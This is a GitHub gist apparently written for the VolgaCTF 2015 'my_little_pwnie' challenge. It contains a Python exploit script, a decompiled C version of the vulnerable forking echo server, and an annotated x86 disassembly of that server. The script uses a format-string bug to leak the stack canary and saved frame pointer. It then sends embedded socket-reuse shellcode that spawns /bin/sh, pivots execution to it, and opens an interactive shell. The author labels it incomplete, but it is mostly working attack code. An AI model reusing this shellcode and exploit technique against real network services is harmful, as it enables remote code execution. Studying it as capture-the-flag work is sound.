Skip to content

Instantly share code, notes, and snippets.

@hhc0null

hhc0null/incomplete_exploit.py

Last active August 29, 2015 14:20
Show Gist options
  • Save hhc0null/ced830305f9d449287e4 to your computer and use it in GitHub Desktop.
Save hhc0null/ced830305f9d449287e4 to your computer and use it in GitHub Desktop.
Download ZIP
[VolgaCTF_2015_pwn-my_little_pwnie-250pts]
Raw
incomplete_exploit.py
#!/usr/bin/env python2
import binascii
import re
import socket
import struct
import subprocess
import sys
import telnetlib
import time
def read_until(f, delim='\n'):
data = ""
while not data.endswith(delim):
data += f.read(1)
return data
def connect(rhp=("pwnie.2015.volgactf.ru", 7777)):
s = socket.create_connection(rhp)
f = s.makefile('rw', bufsize=0)
return s, f
def interact(s):
t = telnetlib.Telnet()
t.sock = s
print "[+] 4ll y0U n33D 15 5h3ll!!"
t.interact()
def p(x, t="<I"):
return struct.pack(t, x)
def u(x, t="<I"):
return struct.unpack(t, x)[0]
def unsigned(x):
return u(p(x, t="<i"), t="<I")
def overwrite(pairs, index=7):
(addrs, datas) = pairs
if len(addrs) != len(datas):
sys.stderr.write("[!] number of `pairs', elements don't be matched in overwrite()\n")
return ""
payload = ""
for addr in addrs:
# A, A+2, B, B+2, C, C+2, ...
payload += p(addr) + p(addr+2)
dataset = map(lambda x: [x&0xffff, (x>>16)&0xffff], datas)
dataset = sum(dataset, []) # it's a cool technique ;)
num = -len(payload)
prev = 0
for i, data in enumerate(dataset):
data += num
data = unsigned(data) if data < 0 else u(p(data, t="<H"), t="<H")
payload += "%{}x%{}$hn%{}x".format(data, index+i, (0x10000 - data + num) % 0x10000)
num = 0
return payload
def stack_leak(data, write=True):
data = data.replace('(nil)', '0x0')
data = data.split('0x')[1:]
stack = map(lambda x: int('0x'+x, 16), data)
if write:
print map(lambda x: "0x{:08x}".format(x), stack)
return stack
def message(message_type, message_body, value=None):
text = ""
if value:
text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
else:
text = "[{}] {}".format(message_type, message_body)
print text
"""
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO Canary found NX disabled No PIE No RPATH No RUNPATH ../my_little_pwnie
## memo
- base address is fixed.
- we can leak GOT any address.
- %29$p => saved ebp, %30$p => saved eip.
"""
diff_saved_ebp_and_buffer = 0x96
diff_saved_ebp_and_canary = 0x1c
# shellcode(sock reuse): execve("/bin/sh", NULL, NULL);
sc = "\x6a\x05\x5e" # fd = 5;
sc += "\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
rhp = ("localhost", 7777)
s, f = connect()
# leak canary & saved ebp
payload = "%26$p%29$p" # canary, saved ebp
print read_until(f, ": ")
f.write(payload+'\n')
stack = stack_leak(read_until(f))
canary, saved_ebp = stack
message("+", "canary", canary)
message("*", "saved ebp", saved_ebp)
pivot_address = saved_ebp - diff_saved_ebp_and_buffer
message("+", "esp will pivot to", pivot_address)
payload = ""
payload += sc
padding_bytes = (diff_saved_ebp_and_buffer-diff_saved_ebp_and_canary) - len(payload)
payload += "%{}x".format(padding_bytes)
payload += p(canary) # it'll conatins null-byte.. :(
payload += "AAAA"*2
payload += p(pivot_address)
message("*", "payload length", len(payload))
message("+", "payload: {}".format(repr(payload)))
assert not '\0' in payload
assert len(payload) <= 0x3f
f.write(payload)
interact(s)
Raw
my_little_pwnie.c
void sub_80488bd(int arg_0, char *arg_4)
{
send(arg_0, arg_4, strlen(arg_4), 0);
}
void sub_80488ee()
{
do {
ebp_0ch = waitpid(WAIT_ANY, NULL, WNOHANG);
} while(ebp_0ch != 0 && ebp_0ch != -1);
}
int sub_8048923(char *arg_0, int arg_4)
{
// Local variables.
char *ebp_5ch;
int ebp_58h;
char *ebp_54h;
int ebp_50h;
char ebp_4ch[0x40];
ebp_5ch = arg_0;
sub_80488bd(arg_4, "Type string to echo back: ");
memset(ebp_4ch, '\0', 0x40);
ebp_50h = recv(arg_4, ebp_4ch, 0x3f, 0);
if(ebp_50h == 0) {
fwrite("Failed to read socket\n", 1, 0x16, stderr);
return -1;
}
ebp_58h = strcmp(ebp_4ch, "exit");
for(ebp_54h = ebp_4ch; ebp_4ch+strlen(ebp_4ch) > ebp_54h; ebp_54h++) {
if(ebp_54h[0] == 'n') {
strcpy(ebp_5ch, "I strip this awful symbol\n");
ebp_58h = 0;
goto loc_8048a57h;
}
// ->>
}
sprintf(&ebp_5ch[6], ebp_4ch); // XXX: FSB
loc_8048a57h:
sub_80488bd(arg_4, ebp_5ch);
return ebp_58h;
}
int sub_8048a7f(int arg_0)
{
sub_80488bd(arg_0, "This is a simple echo server. Type exit to quit.\n");
strcpy(ebp_9ch, "Echo: ");
memset(&ebp_9ch[6], '\0', 0x78);
for(ebp_a0h = 1; ebp_a0h != 0; ) {
ebp_a0h = sub_8048923(ebp_9ch, arg_0);
}
return 0;
}
int main()
{
// ***
esp_3ch = fork();
if(esp_3ch == 0) {
sub_8048a7f(esp_38h);
close(esp_38h);
close(esp_34h);
exit(EXIT_SUCCESS);
}
// ***
}
Raw
my_little_pwnie.disasm
my_little_pwnie: file format elf32-i386
Disassembly of section .init:
080485ec <.init>:
80485ec: 53 push %ebx
80485ed: 83 ec 08 sub $0x8,%esp
80485f0: e8 fb 01 00 00 call 80487f0 <send@plt+0x40>
80485f5: 81 c3 0b 2a 00 00 add $0x2a0b,%ebx
80485fb: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax
8048601: 85 c0 test %eax,%eax
8048603: 74 05 je 804860a <setsockopt@plt-0x16>
8048605: e8 b6 00 00 00 call 80486c0 <__gmon_start__@plt>
804860a: 83 c4 08 add $0x8,%esp
804860d: 5b pop %ebx
804860e: c3 ret
Disassembly of section .plt:
08048610 <setsockopt@plt-0x10>:
8048610: ff 35 04 b0 04 08 pushl 0x804b004
8048616: ff 25 08 b0 04 08 jmp *0x804b008
804861c: 00 00 add %al,(%eax)
...
08048620 <setsockopt@plt>:
8048620: ff 25 0c b0 04 08 jmp *0x804b00c
8048626: 68 00 00 00 00 push $0x0
804862b: e9 e0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048630 <strcmp@plt>:
8048630: ff 25 10 b0 04 08 jmp *0x804b010
8048636: 68 08 00 00 00 push $0x8
804863b: e9 d0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048640 <printf@plt>:
8048640: ff 25 14 b0 04 08 jmp *0x804b014
8048646: 68 10 00 00 00 push $0x10
804864b: e9 c0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048650 <inet_ntoa@plt>:
8048650: ff 25 18 b0 04 08 jmp *0x804b018
8048656: 68 18 00 00 00 push $0x18
804865b: e9 b0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048660 <__stack_chk_fail@plt>:
8048660: ff 25 1c b0 04 08 jmp *0x804b01c
8048666: 68 20 00 00 00 push $0x20
804866b: e9 a0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048670 <htons@plt>:
8048670: ff 25 20 b0 04 08 jmp *0x804b020
8048676: 68 28 00 00 00 push $0x28
804867b: e9 90 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048680 <accept@plt>:
8048680: ff 25 24 b0 04 08 jmp *0x804b024
8048686: 68 30 00 00 00 push $0x30
804868b: e9 80 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048690 <fwrite@plt>:
8048690: ff 25 28 b0 04 08 jmp *0x804b028
8048696: 68 38 00 00 00 push $0x38
804869b: e9 70 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486a0 <waitpid@plt>:
80486a0: ff 25 2c b0 04 08 jmp *0x804b02c
80486a6: 68 40 00 00 00 push $0x40
80486ab: e9 60 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486b0 <puts@plt>:
80486b0: ff 25 30 b0 04 08 jmp *0x804b030
80486b6: 68 48 00 00 00 push $0x48
80486bb: e9 50 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486c0 <__gmon_start__@plt>:
80486c0: ff 25 34 b0 04 08 jmp *0x804b034
80486c6: 68 50 00 00 00 push $0x50
80486cb: e9 40 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486d0 <exit@plt>:
80486d0: ff 25 38 b0 04 08 jmp *0x804b038
80486d6: 68 58 00 00 00 push $0x58
80486db: e9 30 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486e0 <strlen@plt>:
80486e0: ff 25 3c b0 04 08 jmp *0x804b03c
80486e6: 68 60 00 00 00 push $0x60
80486eb: e9 20 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486f0 <__libc_start_main@plt>:
80486f0: ff 25 40 b0 04 08 jmp *0x804b040
80486f6: 68 68 00 00 00 push $0x68
80486fb: e9 10 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048700 <bind@plt>:
8048700: ff 25 44 b0 04 08 jmp *0x804b044
8048706: 68 70 00 00 00 push $0x70
804870b: e9 00 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048710 <sigfillset@plt>:
8048710: ff 25 48 b0 04 08 jmp *0x804b048
8048716: 68 78 00 00 00 push $0x78
804871b: e9 f0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048720 <memset@plt>:
8048720: ff 25 4c b0 04 08 jmp *0x804b04c
8048726: 68 80 00 00 00 push $0x80
804872b: e9 e0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048730 <fork@plt>:
8048730: ff 25 50 b0 04 08 jmp *0x804b050
8048736: 68 88 00 00 00 push $0x88
804873b: e9 d0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048740 <listen@plt>:
8048740: ff 25 54 b0 04 08 jmp *0x804b054
8048746: 68 90 00 00 00 push $0x90
804874b: e9 c0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048750 <sprintf@plt>:
8048750: ff 25 58 b0 04 08 jmp *0x804b058
8048756: 68 98 00 00 00 push $0x98
804875b: e9 b0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048760 <atoi@plt>:
8048760: ff 25 5c b0 04 08 jmp *0x804b05c
8048766: 68 a0 00 00 00 push $0xa0
804876b: e9 a0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048770 <socket@plt>:
8048770: ff 25 60 b0 04 08 jmp *0x804b060
8048776: 68 a8 00 00 00 push $0xa8
804877b: e9 90 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048780 <sigaction@plt>:
8048780: ff 25 64 b0 04 08 jmp *0x804b064
8048786: 68 b0 00 00 00 push $0xb0
804878b: e9 80 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048790 <recv@plt>:
8048790: ff 25 68 b0 04 08 jmp *0x804b068
8048796: 68 b8 00 00 00 push $0xb8
804879b: e9 70 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
080487a0 <close@plt>:
80487a0: ff 25 6c b0 04 08 jmp *0x804b06c
80487a6: 68 c0 00 00 00 push $0xc0
80487ab: e9 60 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
080487b0 <send@plt>:
80487b0: ff 25 70 b0 04 08 jmp *0x804b070
80487b6: 68 c8 00 00 00 push $0xc8
80487bb: e9 50 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
Disassembly of section .text:
080487c0 <.text>:
80487c0: 31 ed xor %ebp,%ebp
80487c2: 5e pop %esi
80487c3: 89 e1 mov %esp,%ecx
80487c5: 83 e4 f0 and $0xfffffff0,%esp
80487c8: 50 push %eax
80487c9: 54 push %esp
80487ca: 52 push %edx
80487cb: 68 e0 8e 04 08 push $0x8048ee0
80487d0: 68 70 8e 04 08 push $0x8048e70
80487d5: 51 push %ecx
80487d6: 56 push %esi
80487d7: 68 24 8b 04 08 push $0x8048b24
80487dc: e8 0f ff ff ff call 80486f0 <__libc_start_main@plt>
80487e1: f4 hlt
80487e2: 66 90 xchg %ax,%ax
80487e4: 66 90 xchg %ax,%ax
80487e6: 66 90 xchg %ax,%ax
80487e8: 66 90 xchg %ax,%ax
80487ea: 66 90 xchg %ax,%ax
80487ec: 66 90 xchg %ax,%ax
80487ee: 66 90 xchg %ax,%ax
80487f0: 8b 1c 24 mov (%esp),%ebx
80487f3: c3 ret
80487f4: 66 90 xchg %ax,%ax
80487f6: 66 90 xchg %ax,%ax
80487f8: 66 90 xchg %ax,%ax
80487fa: 66 90 xchg %ax,%ax
80487fc: 66 90 xchg %ax,%ax
80487fe: 66 90 xchg %ax,%ax
8048800: b8 7f b0 04 08 mov $0x804b07f,%eax
8048805: 2d 7c b0 04 08 sub $0x804b07c,%eax
804880a: 83 f8 06 cmp $0x6,%eax
804880d: 77 01 ja 8048810 <send@plt+0x60>
804880f: c3 ret
8048810: b8 00 00 00 00 mov $0x0,%eax
8048815: 85 c0 test %eax,%eax
8048817: 74 f6 je 804880f <send@plt+0x5f>
8048819: 55 push %ebp
804881a: 89 e5 mov %esp,%ebp
804881c: 83 ec 18 sub $0x18,%esp
804881f: c7 04 24 7c b0 04 08 movl $0x804b07c,(%esp)
8048826: ff d0 call *%eax
8048828: c9 leave
8048829: c3 ret
804882a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048830: b8 7c b0 04 08 mov $0x804b07c,%eax
8048835: 2d 7c b0 04 08 sub $0x804b07c,%eax
804883a: c1 f8 02 sar $0x2,%eax
804883d: 89 c2 mov %eax,%edx
804883f: c1 ea 1f shr $0x1f,%edx
8048842: 01 d0 add %edx,%eax
8048844: d1 f8 sar %eax
8048846: 75 01 jne 8048849 <send@plt+0x99>
8048848: c3 ret
8048849: ba 00 00 00 00 mov $0x0,%edx
804884e: 85 d2 test %edx,%edx
8048850: 74 f6 je 8048848 <send@plt+0x98>
8048852: 55 push %ebp
8048853: 89 e5 mov %esp,%ebp
8048855: 83 ec 18 sub $0x18,%esp
8048858: 89 44 24 04 mov %eax,0x4(%esp)
804885c: c7 04 24 7c b0 04 08 movl $0x804b07c,(%esp)
8048863: ff d2 call *%edx
8048865: c9 leave
8048866: c3 ret
8048867: 89 f6 mov %esi,%esi
8048869: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
8048870: 80 3d 80 b0 04 08 00 cmpb $0x0,0x804b080
8048877: 75 13 jne 804888c <send@plt+0xdc>
8048879: 55 push %ebp
804887a: 89 e5 mov %esp,%ebp
804887c: 83 ec 08 sub $0x8,%esp
804887f: e8 7c ff ff ff call 8048800 <send@plt+0x50>
8048884: c6 05 80 b0 04 08 01 movb $0x1,0x804b080
804888b: c9 leave
804888c: f3 c3 repz ret
804888e: 66 90 xchg %ax,%ax
8048890: a1 10 af 04 08 mov 0x804af10,%eax
8048895: 85 c0 test %eax,%eax
8048897: 74 1f je 80488b8 <send@plt+0x108>
8048899: b8 00 00 00 00 mov $0x0,%eax
804889e: 85 c0 test %eax,%eax
80488a0: 74 16 je 80488b8 <send@plt+0x108>
80488a2: 55 push %ebp
80488a3: 89 e5 mov %esp,%ebp
80488a5: 83 ec 18 sub $0x18,%esp
80488a8: c7 04 24 10 af 04 08 movl $0x804af10,(%esp)
80488af: ff d0 call *%eax
80488b1: c9 leave
80488b2: e9 79 ff ff ff jmp 8048830 <send@plt+0x80>
80488b7: 90 nop
80488b8: e9 73 ff ff ff jmp 8048830 <send@plt+0x80>
void sub_80488bd(int arg_0, char *arg_4)
{
80488bd: 55 push %ebp
80488be: 89 e5 mov %esp,%ebp
80488c0: 83 ec 18 sub $0x18,%esp
80488c3: 8b 45 0c mov 0xc(%ebp),%eax
80488c6: 89 04 24 mov %eax,(%esp)
80488c9: e8 12 fe ff ff call 80486e0 <strlen@plt>
80488ce: c7 44 24 0c 00 00 00 movl $0x0,0xc(%esp)
80488d5: 00
80488d6: 89 44 24 08 mov %eax,0x8(%esp)
80488da: 8b 45 0c mov 0xc(%ebp),%eax
80488dd: 89 44 24 04 mov %eax,0x4(%esp)
80488e1: 8b 45 08 mov 0x8(%ebp),%eax
80488e4: 89 04 24 mov %eax,(%esp)
80488e7: e8 c4 fe ff ff call 80487b0 <send@plt>
send(arg_0, arg_4, strlen(arg_4), 0);
80488ec: c9 leave
80488ed: c3 ret
}
void sub_80488ee()
{
80488ee: 55 push %ebp
80488ef: 89 e5 mov %esp,%ebp
80488f1: 83 ec 28 sub $0x28,%esp
do {
80488f4: c7 44 24 08 01 00 00 movl $0x1,0x8(%esp)
80488fb: 00
80488fc: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048903: 00
8048904: c7 04 24 ff ff ff ff movl $0xffffffff,(%esp)
804890b: e8 90 fd ff ff call 80486a0 <waitpid@plt>
8048910: 89 45 f4 mov %eax,-0xc(%ebp)
ebp_0ch = waitpid(WAIT_ANY, NULL, WNOHANG);
8048913: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
8048917: 74 08 je 8048921 <send@plt+0x171>
8048919: 83 7d f4 ff cmpl $0xffffffff,-0xc(%ebp)
804891d: 74 02 je 8048921 <send@plt+0x171>
804891f: eb d3 jmp 80488f4 <send@plt+0x144>
} while(ebp_0ch != 0 && ebp_0ch != -1);
8048921: c9 leave
8048922: c3 ret
}
int sub_8048923(arg_0, arg_4)
{
8048923: 55 push %ebp
8048924: 89 e5 mov %esp,%ebp
8048926: 83 ec 78 sub $0x78,%esp
// Local variables.
char *ebp_5ch;
8048929: 8b 45 08 mov 0x8(%ebp),%eax
804892c: 89 45 a4 mov %eax,-0x5c(%ebp)
ebp_5ch = arg_0;
804892f: 65 a1 14 00 00 00 mov %gs:0x14,%eax
8048935: 89 45 f4 mov %eax,-0xc(%ebp)
8048938: 31 c0 xor %eax,%eax
804893a: c7 44 24 04 00 8f 04 movl $0x8048f00,0x4(%esp)
8048941: 08
8048942: 8b 45 0c mov 0xc(%ebp),%eax
8048945: 89 04 24 mov %eax,(%esp)
8048948: e8 70 ff ff ff call 80488bd <send@plt+0x10d>
sub_80488bd(arg_4, "Type string to echo back: ");
804894d: c7 44 24 08 40 00 00 movl $0x40,0x8(%esp)
8048954: 00
8048955: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
804895c: 00
804895d: 8d 45 b4 lea -0x4c(%ebp),%eax
8048960: 89 04 24 mov %eax,(%esp)
8048963: e8 b8 fd ff ff call 8048720 <memset@plt>
memset(ebp_4ch, '\0', 0x40);
8048968: c7 44 24 0c 00 00 00 movl $0x0,0xc(%esp)
804896f: 00
8048970: c7 44 24 08 3f 00 00 movl $0x3f,0x8(%esp)
8048977: 00
8048978: 8d 45 b4 lea -0x4c(%ebp),%eax
804897b: 89 44 24 04 mov %eax,0x4(%esp)
804897f: 8b 45 0c mov 0xc(%ebp),%eax
8048982: 89 04 24 mov %eax,(%esp)
8048985: e8 06 fe ff ff call 8048790 <recv@plt>
804898a: 89 45 b0 mov %eax,-0x50(%ebp)
ebp_50h = recv(arg_4, ebp_4ch, 0x3f, 0);
804898d: 83 7d b0 00 cmpl $0x0,-0x50(%ebp)
8048991: 75 2f jne 80489c2 <send@plt+0x212>
if(ebp_50h == 0) {
8048993: a1 7c b0 04 08 mov 0x804b07c,%eax
8048998: 89 44 24 0c mov %eax,0xc(%esp)
804899c: c7 44 24 08 16 00 00 movl $0x16,0x8(%esp)
80489a3: 00
80489a4: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
80489ab: 00
80489ac: c7 04 24 1b 8f 04 08 movl $0x8048f1b,(%esp)
80489b3: e8 d8 fc ff ff call 8048690 <fwrite@plt>
fwrite("Failed to read socket\n", 1, 0x16, stderr);
80489b8: b8 ff ff ff ff mov $0xffffffff,%eax
80489bd: e9 aa 00 00 00 jmp 8048a6c <send@plt+0x2bc>
return -1;
}
80489c2: c7 44 24 04 32 8f 04 movl $0x8048f32,0x4(%esp)
80489c9: 08
80489ca: 8d 45 b4 lea -0x4c(%ebp),%eax
80489cd: 89 04 24 mov %eax,(%esp)
80489d0: e8 5b fc ff ff call 8048630 <strcmp@plt>
80489d5: 89 45 a8 mov %eax,-0x58(%ebp)
ebp_58h = strcmp(ebp_4ch, "exit");
80489d8: 8d 45 b4 lea -0x4c(%ebp),%eax
80489db: 89 45 ac mov %eax,-0x54(%ebp)
80489de: eb 4d jmp 8048a2d <send@plt+0x27d>
for(ebp_54h = ebp_4ch; ebp_4ch+strlen(ebp_4ch) > ebp_54h; ebp_54h++) {
80489e0: 8b 45 ac mov -0x54(%ebp),%eax
80489e3: 0f b6 00 movzbl (%eax),%eax
80489e6: 3c 6e cmp $0x6e,%al
80489e8: 75 3f jne 8048a29 <send@plt+0x279>
if(ebp_54h[0] == 'n') {
80489ea: 8b 45 a4 mov -0x5c(%ebp),%eax
80489ed: c7 00 49 20 73 74 movl $0x74732049,(%eax)
80489f3: c7 40 04 72 69 70 20 movl $0x20706972,0x4(%eax)
80489fa: c7 40 08 74 68 69 73 movl $0x73696874,0x8(%eax)
8048a01: c7 40 0c 20 61 77 66 movl $0x66776120,0xc(%eax)
8048a08: c7 40 10 75 6c 20 73 movl $0x73206c75,0x10(%eax)
8048a0f: c7 40 14 79 6d 62 6f movl $0x6f626d79,0x14(%eax)
8048a16: 66 c7 40 18 6c 0a movw $0xa6c,0x18(%eax)
8048a1c: c6 40 1a 00 movb $0x0,0x1a(%eax)
strcpy(ebp_5ch, "I strip this awful symbol\n");
8048a20: c7 45 a8 00 00 00 00 movl $0x0,-0x58(%ebp)
ebp_58h = 0;
8048a27: eb 2e jmp 8048a57 <send@plt+0x2a7>
goto loc_8048a57h;
}
8048a29: 83 45 ac 01 addl $0x1,-0x54(%ebp)
// ->>
8048a2d: 8d 45 b4 lea -0x4c(%ebp),%eax
8048a30: 89 04 24 mov %eax,(%esp)
8048a33: e8 a8 fc ff ff call 80486e0 <strlen@plt>
8048a38: 8d 55 b4 lea -0x4c(%ebp),%edx
8048a3b: 01 d0 add %edx,%eax
8048a3d: 3b 45 ac cmp -0x54(%ebp),%eax
8048a40: 77 9e ja 80489e0 <send@plt+0x230>
}
8048a42: 8b 45 a4 mov -0x5c(%ebp),%eax
8048a45: 8d 50 06 lea 0x6(%eax),%edx
8048a48: 8d 45 b4 lea -0x4c(%ebp),%eax
8048a4b: 89 44 24 04 mov %eax,0x4(%esp)
8048a4f: 89 14 24 mov %edx,(%esp)
8048a52: e8 f9 fc ff ff call 8048750 <sprintf@plt>
sprintf(&ebp_5ch[6], ebp_4ch);
loc_8048a57h:
8048a57: 8b 45 a4 mov -0x5c(%ebp),%eax
8048a5a: 89 44 24 04 mov %eax,0x4(%esp)
8048a5e: 8b 45 0c mov 0xc(%ebp),%eax
8048a61: 89 04 24 mov %eax,(%esp)
8048a64: e8 54 fe ff ff call 80488bd <send@plt+0x10d>
sub_80488bd(arg_4, ebp_5ch);
8048a69: 8b 45 a8 mov -0x58(%ebp),%eax
8048a6c: 8b 4d f4 mov -0xc(%ebp),%ecx
8048a6f: 65 33 0d 14 00 00 00 xor %gs:0x14,%ecx
8048a76: 74 05 je 8048a7d <send@plt+0x2cd>
8048a78: e8 e3 fb ff ff call 8048660 <__stack_chk_fail@plt>
8048a7d: c9 leave
8048a7e: c3 ret
return ebp_58h;
}
sub_8048a7f(int arg_0)
{
8048a7f: 55 push %ebp
8048a80: 89 e5 mov %esp,%ebp
8048a82: 57 push %edi
8048a83: 56 push %esi
8048a84: 53 push %ebx
8048a85: 81 ec ac 00 00 00 sub $0xac,%esp
8048a8b: 65 a1 14 00 00 00 mov %gs:0x14,%eax
8048a91: 89 45 e4 mov %eax,-0x1c(%ebp)
8048a94: 31 c0 xor %eax,%eax
8048a96: c7 44 24 04 38 8f 04 movl $0x8048f38,0x4(%esp)
8048a9d: 08
8048a9e: 8b 45 08 mov 0x8(%ebp),%eax
8048aa1: 89 04 24 mov %eax,(%esp)
8048aa4: e8 14 fe ff ff call 80488bd <send@plt+0x10d>
sub_80488bd(arg_0, "This is a simple echo server. Type exit to quit.\n");
8048aa9: c7 85 64 ff ff ff 45 movl $0x6f686345,-0x9c(%ebp)
8048ab0: 63 68 6f
8048ab3: c7 85 68 ff ff ff 3a movl $0x203a,-0x98(%ebp)
8048aba: 20 00 00
strcpy(ebp_9ch, "Echo: ");
8048abd: 8d 9d 6c ff ff ff lea -0x94(%ebp),%ebx
8048ac3: b8 00 00 00 00 mov $0x0,%eax
8048ac8: ba 1e 00 00 00 mov $0x1e,%edx
8048acd: 89 df mov %ebx,%edi
8048acf: 89 d1 mov %edx,%ecx
8048ad1: f3 ab rep stos %eax,%es:(%edi)
memset(&ebp_9ch[6], '\0', 0x78);
8048ad3: c7 85 60 ff ff ff 01 movl $0x1,-0xa0(%ebp)
8048ada: 00 00 00
8048add: eb 1b jmp 8048afa <send@plt+0x34a>
for(ebp_a0h = 1; ebp_a0h != 0; ) {
8048adf: 8b 45 08 mov 0x8(%ebp),%eax
8048ae2: 89 44 24 04 mov %eax,0x4(%esp)
8048ae6: 8d 85 64 ff ff ff lea -0x9c(%ebp),%eax
8048aec: 89 04 24 mov %eax,(%esp)
8048aef: e8 2f fe ff ff call 8048923 <send@plt+0x173>
ebp_a0h = sub_8048923(ebp_9ch, arg_0);
8048af4: 89 85 60 ff ff ff mov %eax,-0xa0(%ebp)
8048afa: 83 bd 60 ff ff ff 00 cmpl $0x0,-0xa0(%ebp)
8048b01: 75 dc jne 8048adf <send@plt+0x32f>
}
8048b03: b8 00 00 00 00 mov $0x0,%eax
8048b08: 8b 75 e4 mov -0x1c(%ebp),%esi
8048b0b: 65 33 35 14 00 00 00 xor %gs:0x14,%esi
8048b12: 74 05 je 8048b19 <send@plt+0x369>
8048b14: e8 47 fb ff ff call 8048660 <__stack_chk_fail@plt>
8048b19: 81 c4 ac 00 00 00 add $0xac,%esp
8048b1f: 5b pop %ebx
8048b20: 5e pop %esi
8048b21: 5f pop %edi
8048b22: 5d pop %ebp
8048b23: c3 ret
return 0;
}
int main()
{
8048b24: 55 push %ebp
8048b25: 89 e5 mov %esp,%ebp
8048b27: 83 e4 f0 and $0xfffffff0,%esp
8048b2a: 81 ec f0 00 00 00 sub $0xf0,%esp
8048b30: 8b 45 0c mov 0xc(%ebp),%eax
8048b33: 89 44 24 1c mov %eax,0x1c(%esp)
8048b37: 65 a1 14 00 00 00 mov %gs:0x14,%eax
8048b3d: 89 84 24 ec 00 00 00 mov %eax,0xec(%esp)
8048b44: 31 c0 xor %eax,%eax
8048b46: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
8048b4a: 75 15 jne 8048b61 <send@plt+0x3b1>
8048b4c: 8b 44 24 1c mov 0x1c(%esp),%eax
8048b50: 83 c0 04 add $0x4,%eax
8048b53: 8b 00 mov (%eax),%eax
8048b55: 89 04 24 mov %eax,(%esp)
8048b58: e8 03 fc ff ff call 8048760 <atoi@plt>
8048b5d: 85 c0 test %eax,%eax
8048b5f: 75 18 jne 8048b79 <send@plt+0x3c9>
8048b61: c7 04 24 6a 8f 04 08 movl $0x8048f6a,(%esp)
8048b68: e8 43 fb ff ff call 80486b0 <puts@plt>
8048b6d: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048b74: e8 57 fb ff ff call 80486d0 <exit@plt>
8048b79: 8b 44 24 1c mov 0x1c(%esp),%eax
8048b7d: 83 c0 04 add $0x4,%eax
8048b80: 8b 00 mov (%eax),%eax
8048b82: 89 04 24 mov %eax,(%esp)
8048b85: e8 d6 fb ff ff call 8048760 <atoi@plt>
8048b8a: 89 44 24 30 mov %eax,0x30(%esp)
8048b8e: c7 44 24 40 ee 88 04 movl $0x80488ee,0x40(%esp)
8048b95: 08
8048b96: c7 84 24 c4 00 00 00 movl $0x10000000,0xc4(%esp)
8048b9d: 00 00 00 10
8048ba1: 8d 44 24 40 lea 0x40(%esp),%eax
8048ba5: 83 c0 04 add $0x4,%eax
8048ba8: 89 04 24 mov %eax,(%esp)
8048bab: e8 60 fb ff ff call 8048710 <sigfillset@plt>
8048bb0: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048bb7: 00
8048bb8: 8d 44 24 40 lea 0x40(%esp),%eax
8048bbc: 89 44 24 04 mov %eax,0x4(%esp)
8048bc0: c7 04 24 11 00 00 00 movl $0x11,(%esp)
8048bc7: e8 b4 fb ff ff call 8048780 <sigaction@plt>
8048bcc: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048bd3: 00
8048bd4: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048bdb: 00
8048bdc: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8048be3: e8 88 fb ff ff call 8048770 <socket@plt>
8048be8: 89 44 24 34 mov %eax,0x34(%esp)
8048bec: 83 7c 24 34 00 cmpl $0x0,0x34(%esp)
8048bf1: 79 2f jns 8048c22 <send@plt+0x472>
8048bf3: a1 7c b0 04 08 mov 0x804b07c,%eax
8048bf8: 89 44 24 0c mov %eax,0xc(%esp)
8048bfc: c7 44 24 08 19 00 00 movl $0x19,0x8(%esp)
8048c03: 00
8048c04: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048c0b: 00
8048c0c: c7 04 24 87 8f 04 08 movl $0x8048f87,(%esp)
8048c13: e8 78 fa ff ff call 8048690 <fwrite@plt>
8048c18: b8 ff ff ff ff mov $0xffffffff,%eax
8048c1d: e9 36 02 00 00 jmp 8048e58 <send@plt+0x6a8>
8048c22: c7 44 24 28 10 00 00 movl $0x10,0x28(%esp)
8048c29: 00
8048c2a: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp)
8048c31: 00
8048c32: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048c39: 00
